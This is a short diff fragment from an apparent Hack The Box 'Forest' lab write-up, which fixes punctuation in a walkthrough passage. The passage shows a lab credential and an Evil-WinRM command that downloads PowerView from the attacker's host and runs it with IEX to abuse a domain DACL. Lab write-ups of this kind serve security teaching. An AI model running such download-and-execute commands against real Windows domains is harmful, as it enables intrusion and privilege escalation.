axcheron/axcheron.github.io/_htb/01_writeup_forest.md

 SMB         10.129.95.210   445    FOREST           [+] htb.local\ax:Qwerty1!
 ```

-Perfect !
+Perfect!
 Now, to abuse the DACL, we used a well-known PowerShell that aims to gain network situational awareness on Windows domains, [PowerView](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1).
 Note that we used the local **Apache** service on Kali to host the file and download it from the remote machine.

 ```bash
 *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> (New-Object System.Net.WebClient).DownloadString('http://10.10.14.xx/PowerView.ps1') | IEX